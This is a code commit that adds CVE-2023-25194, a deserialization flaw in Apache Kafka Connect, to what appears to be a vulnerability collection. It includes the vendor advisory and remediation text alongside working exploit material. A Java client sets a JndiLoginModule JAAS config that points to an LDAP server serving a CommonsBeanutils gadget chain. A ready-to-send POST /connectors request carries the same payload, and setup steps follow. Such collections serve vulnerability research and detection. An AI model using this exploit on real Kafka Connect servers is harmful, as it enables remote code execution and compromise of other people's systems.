!344 添加CVE-2023-25194

Merge pull request !344 from bihezhao/Feat_CVE_2023_25194
This commit is contained in:
Re3et 2023-04-04 09:17:27 +00:00 committed by Gitee
commit d2d7fab740
No known key found for this signature in database
GPG Key ID: 173E9B9CA92EEF8F
5 changed files with 129 additions and 0 deletions

View File

@ -0,0 +1,28 @@
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.example</groupId>
<artifactId>CVE-2023-25194</artifactId>
<version>1.0-SNAPSHOT</version>
<properties>
<maven.compiler.source>8</maven.compiler.source>
<maven.compiler.target>8</maven.compiler.target>
</properties>
<dependencies>
<dependency>
<groupId>org.apache.kafka</groupId>
<artifactId>kafka-clients</artifactId>
<version>3.3.0</version>
</dependency>
<dependency>
<groupId>commons-beanutils</groupId>
<artifactId>commons-beanutils</artifactId>
<version>1.9.4</version>
</dependency>
</dependencies>
</project>

View File

@ -0,0 +1,25 @@
import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.Producer;
import org.apache.kafka.clients.producer.ProducerRecord;
import java.util.Properties;
public class Test {
public static void main(String[] args) {
Properties props = new Properties();
props.put("sasl.mechanism","SCRAM-SHA-256");
props.put("security.protocol","SASL_SSL");
// props.put("security.protocol","SASL_PLAINTEXT");
props.put("sasl.jaas.config","com.sun.security.auth.module.JndiLoginModule " +
"required user.provider.url=\"ldap://127.0.0.1:1389/deserialCommonsBeanutils1\" " +
"useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" " +
"group.provider.url=\"xxx\";");
props.put("bootstrap.servers", "localhost:9092");
props.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
props.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
Producer<String, String> producer = new KafkaProducer<>(props);
}
}

View File

@ -0,0 +1,54 @@
## Description
A possible security vulnerability has been identified in Apache Kafka Connect. This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka 2.3.0. When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to "com.sun.security.auth.module.JndiLoginModule", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box configurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector client override policy that permits them. Since Apache Kafka 3.4.0, we have added a system property ("-Dorg.apache.kafka.disallowed.login.modules") to disable the problematic login modules usage in SASL JAAS configuration. Also by default "com.sun.security.auth.module.JndiLoginModule" is disabled in Apache Kafka 3.4.0. We advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also examine connector dependencies for vulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation. Finally, in addition to leveraging the "org.apache.kafka.disallowed.login.modules" system property, Kafka Connect users can also implement their own connector client config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.
## Poc
```
POST /connectors HTTP/1.1
Host: xxxx:8083
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json
Connection: close
Content-Length: 1109
{"name": "test",
"config":
{
"connector.class":"io.debezium.connector.mysql.MySqlConnector",
"database.hostname": "xxxxx",
"database.port": "3306",
"database.user": "root",
"database.password": "xxxxxx",
"database.dbname": "xxxx",
"database.sslmode": "SSL_MODE",
"database.server.id": "1234",
"database.server.name": "localhost",
"table.include.list": "MYSQL_TABLES",
"tasks.max":"1",
"topic.prefix": "aaa22",
"debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
"schema.history.internal.kafka.topic": "aaa22",
"schema.history.internal.kafka.bootstrap.servers": "kafka:9202",
"database.history.producer.security.protocol": "SASL_SSL",
"database.history.producer.sasl.mechanism": "PLAIN",
"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://aaa\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
}
}
```
## Attention
1. Import the libs by copy them to the kafka's libs directory.
2. Kafka Connect must be running. (./bin/connect-distributed.sh config/connect-distributed.properties)
3. mysql info must be right, and make sure kafka connect can connect the db.
## References
- https://github.com/ohnonoyesyes/CVE-2023-25194
- https://github.com/luelueking/Java-CVE-Lists/tree/main/CVE-2023-25194

View File

@ -0,0 +1,20 @@
id: CVE-2023-25194
source:
https://github.com/ohnonoyesyes/CVE-2023-25194
info:
name: Apache Kafka 是一个分布式事件存储和流处理平台。 它是由 Apache 软件基金会开发的一个开源系统,使用 Java 和 Scala 编写。
severity: high
description: |
在 Apache Kafka Connect 中发现了一个可能的安全漏洞。 当类路径中有小工具时攻击者可以导致不可信数据的无限制反序列化RCE漏洞。
scope-of-influence: Apache Kafka 2.3.0
reference:
- https://nvd.nist.gov/vuln/detail/cve-2023-25194
- https://lists.apache.org/thread/vy1c7fqcdqvq5grcqp6q5jyyb302khyz
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-25194
cwe-id: CWE-502
cnvd-id: None
kve-id: None
tags: 不可信数据反序列化

View File

@ -14,6 +14,8 @@ cve:
apache-Dubbo:
- CVE-2021-43297
- CVE-2021-25641
apache-Kafka:
- CVE-2023-25194
apache-OFBiz:
- CVE-2021-26295
apache-Airflow: